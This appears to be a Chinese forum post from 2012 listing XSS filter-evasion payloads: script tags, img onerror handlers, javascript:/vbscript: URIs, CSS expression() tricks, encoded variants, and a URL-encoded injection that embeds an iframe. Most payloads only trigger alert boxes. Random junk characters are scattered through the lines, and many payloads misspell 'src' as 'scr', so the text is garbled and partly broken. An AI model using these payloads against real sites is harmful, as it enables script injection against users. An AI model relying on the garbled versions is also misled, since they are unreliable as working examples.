<script>alert("跨站")</script> (最常用)
" o! O4 b" w. I* B9 M) r<img scr=javascript:alert("跨站")></img>
- R3 g3 c% }% C7 s# P7 G<img scr="javascript: alert(/跨站/)></img>8 g0 Y( r( G W- j I# |6 k* B
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
) v; c6 Z, H( @/ N0 v$ |<img scr="#" onerror=alert(/跨站/)></img>
6 H: d0 v% l( |) J( i) R& {# J3 }<img scr="#" style="xss:expression(alert(/xss/));"></img>+ X* T1 [, ]/ R( a6 F
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
& E/ e4 w+ I' B% f4 y6 p<img src=vbscript:msgbox ("xss")></img>. E3 A8 Q- d: d; c; F* O! i
<style> input {left:expression (alert('xss'))}</style>8 \$ F u8 H# m& }8 ]' @
<div style={left:expression (alert('xss'))}></div>
2 a: ~/ ~$ o! P: M( G1 T! r. G7 s<div style={left:exp/* */ression (alert('xss'))}></div>
; p" N! [! n& C5 C% j: n<div style={left:\0065\0078ression (alert('xss'))}></div>
3 Z- Z% g2 n$ M1 Z% ~; {: }' Whtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
3 T: V. ~; {5 w: U. Iunicode <div style="{left:expRessioN (alert('xss'))}">, } Y5 A2 X0 C2 E
2 Q3 _+ T! @) r8 A"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
- j6 H b2 }8 f5 n |
发表于 2012-9-13 17:15:04
收藏
支持
反对